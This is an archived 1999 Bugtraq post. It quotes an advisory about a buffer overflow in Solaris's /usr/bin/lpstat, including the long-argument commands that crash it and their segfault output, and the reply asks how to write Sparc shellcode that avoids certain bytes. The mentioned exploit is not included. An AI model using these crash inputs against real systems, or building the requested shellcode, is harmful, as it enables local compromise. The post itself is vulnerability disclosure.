Bugtraq mailing list archives
Re: Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat
From: gang_w () goselecttech com (GANG WANG)
Date: Mon, 8 Feb 1999 18:31:50 -0800
Things are a little different on Solaris 2.6 Sparc. lpstat only accepts a buffer which doesn't contain \x20, \x0a or \x3b. Can sb teach me how to write a shellcode on Solaris Sparc without those characters? I feel that I'm so stupid :-(

G.

-----Original Message-----
From: plasmoid deep/thc/clb <plasmoid () PIMMEL COM>
To: BUGTRAQ () NETSPACE ORG <BUGTRAQ () NETSPACE ORG>
Date: Wednesday, January 27, 1999 11:16 AM
Subject: Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat

On Aug/25/98 Sun released the following patches for lp:

Solaris2.6 Sparc: 106235-02
Solaris2.6 x86: 106236

It is quite sad, that they did not fix another overflow in /usr/bin/lpstat. I testified this bug on either Solaris 2.7 x86 and 2.6 Sparc, I assume that it is also present on Solaris 2.6 x86 and 2.7 Sparc.

Solaris 2.7 x86

% plasmoid@gorkie:foo> lpstat -c `perl -e 'print "A" x 998'`
% UX:lpstat: ERROR: Class [...]
% AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does
% not exist.
% TO FIX: Use the "lpstat -c all" command to list
% all known classes.
% Segmentation Fault
% plasmoid@gorkie:foo>

Solaris 2.6 Sparc

% plasmoid@bock:foo> lpstat -c `perl -e 'print "AAAA" x 250'`
% UX:lpstat: ERROR: Class [...]
% AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does not
% exist.
% TO FIX: Use the "lpstat -c all" command to list
% all known classes.
% Segmentation Fault
% plasmoid@bock:foo>

This overflow is definitely exploitable, I attached the exploit for Solaris x86. Quality patches for all Solaris versions can be obtained from www.hert.org, a fast security source.

plasmoid deep/thc/clb
http://thc.inferno.tusculum.edu